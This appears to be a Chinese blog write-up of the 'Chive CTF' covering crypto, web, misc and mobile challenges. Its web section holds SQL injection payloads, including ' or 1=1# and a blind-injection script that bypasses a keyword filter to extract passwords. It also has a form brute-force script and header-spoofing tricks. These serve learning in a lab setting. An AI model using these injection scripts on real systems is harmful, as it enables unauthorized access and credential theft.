Chive CTF WP

Posted on 2020-04-18,5 min read

crypto

Rainbow

就因为维吉尼亚码表背景是彩虹所以是维吉尼亚?????????
然后在线解一下

13道栏

用W型栅栏解密。得到http://www.atoolbox.net/Tool.php?Id=777.com
然后rot13一下。凯撒也可以。毕竟凯撒13次=ROT13

你以为这是普通的栅栏?

和上题一样。一把梭

ez_py_challenge

简单的逆向。反推一下

data='uCLJvGLeHuxMDMNyt{Bp'
def decode2(ans):
    s=''
    for i in ans:
        x=(ord(i)^21)-37
        s+=chr(x)
    return s
def decode1(ans):
    s=''
    for i in ans:
        x=(ord(i)-12)^73
        s+=chr(x)
    return s
data2=decode2(data)
print(decode1(data2))

ez_RSA

脚本一套

from Crypto.PublicKey import RSA
import sys

p = 8169558889361
q = 1513871
e = 17
n = (p - 1) * (q - 1)
i = 0
# 17x + ny = 1
while True:
    if ((1 - n * i) % e == 0):
        break;
    i -= 1
print '%d' % ((1 - n * i) / e)

use_the_keyboard

第一个base64解密后。看键盘。是个O形状。取包围的字符
第二个base64解密后。看键盘。也取中间的。比如PL9I。就是O

皇帝的flag

http://zero.rovelast.com/
复制粘贴完事

摩斯探长前传

文档中大写字母就输出。小写字母就pass

data='文档中的字'
result=''
for i in data:
        if 64<ord(i)<91:
                result+=i
print(result.replace('ZERO','0').replace('ONE','1'))

得到

============== RESTART: C:\Users\Administrator\Desktop\1 (3).py ==============
ZEROZEROONEZEROPZEROONEZEROZEROPZEROONEPONEONEZEROPONEONEONEONEZEROONEONEPZEROZEROZEROZEROPZEROONEONEONEONEPONEZEROZEROPZEROZEROZEROONEONEPZEROZEROONEONEZEROONEPZEROONEONEONEONEPONEZEROPZEROZEROONEONEZEROONEPZEROONEONEZEROPZEROONEZEROZEROPZEROZEROZEROZEROONEPZEROONEONEONEONEPONEZEROPZEROZEROONEONEZEROONEPZEROZEROZEROZEROZEROPZEROONEONEONEONEPONEONEONEONEZEROPZEROZEROZEROZEROPONEONEZEROZEROZEROPONEONEONEONEONEZEROONE
>>> 
============== RESTART: C:\Users\Administrator\Desktop\1 (3).py ==============
0010P0100P01P110P1111011P0000P01111P100P00011P001101P01111P10P001101P0110P0100P00001P01111P10P001101P00000P01111P11110P0000P11000P1111101

根据题目morse。这是个摩斯密码。然后P应该是空格
http://www.all-tool.cn/Tools/morse/用这个解
其他的解不出来。

Web

index.?

curl -i http://vps.vaala.cat:28082/index.php

勇者斗恶龙

去掉html中的限制。然后一直点。到100级。不能多也不能少

勇者谎称斗恶龙

控制台。level=99 。然后练级到100.挑战恶龙。拿flag

catchME

curl -i http://vps.vaala.cat:28015/
header头

magicpassword

' or 1=1#

GITHUB

gitub搜vaala。再去commit找提交纪录。得到Flag

一百万猜数

生成随机数以及比较都是在前端可控。console输入num。就能得到生成的随机数。输入即可拿到Flag

生日快乐

爆破题

url='http://vps.vaala.cat:28094/'
for m in range(1,13):
    for d in range(1,32):
        data={"card":2,
                  "year":2000,
                  "month":m,
                  "day":d}
        r=requests.post(url=url,data=data).text
        if '你记错啦' in r:
            pass
        else:
            print(r)
            break

ezheader

XFF头+UserAgent+Referer

magicMD5

弱类型+强碰撞不多说了

正则公主的秘密日记

推荐一个工具
http://www.atoolbox.net/Tool.php?Id=777.com

1 or more times     要求带一个或者更多
0 or more times     要求带零个或者更多
4 times                   要求带4个
one of                     带有其中一个字符

贷款

data字段是存储用户金额以及还款信息的
前32位为用户金额
后32位为还款信息
将后32位替换为刚登陆的时候。前32位不管。
金额变了。还款一直是0

Robot

ssti

GetPassword

注入。select替换为空

import requests
url="http://vps.vaala.cat:28023/index.php?username=1'||"
for a in range(40,60):
    for b in range(30,130):
        payload="(ascii(substr((selselectect/**/group_concat(password)/**/from/**/vaala),"+str(a)+",1)))="+str(b)+"--+"
        r=requests.get(url+payload).text
        if 'you are my vaala' in r:
            print(chr(b))
            break

Misc

菩提本无树,明镜亦非台

佛曰解密

害怕黑暗吗

Stegsolve.jar 通道看到

谢尔顿的噩梦

听一下发现有敲击码

111 shadan 
111 shadan

111 panni
11  shadan

1111 shadan
111 panni

11 shadan
11 shadan

111 panni
11 shadan

111 shadan
111 panni

1111 shadan
1111 shadan

111 panni
111 shadan

11 shadan
111 panni

1  shadan
1  shadan

111 panni
1111 shadan

11 shadan
111 panni

1 shadan
11111 shadan

然后转换为敲击码
paini的不用抓换。
得到

33 24 22 23 44 32 11 42 15

give_you_flag

PS反色。补齐定位点

搏击第五空间

exittool。base64解密下得到flag

简单流量分析

追踪HTTP流。得到Flag

君は蔷薇より美しい

图片修改高度。得到BV号

视频中间部分。有黑白黑白。猜测要么是二维码。要么是0101
然后白色为0.黑色为1.得到Flag
这题目??给👴整吐了。是真的看吐了。头晕脑胀

Mobile

送给最好的TA

notepad++。搜搜字符串

签到

magicCube

flag在某个JS里面。

下一篇: ctf473831530_2018_web_virink_web(php-fpm+rsync)→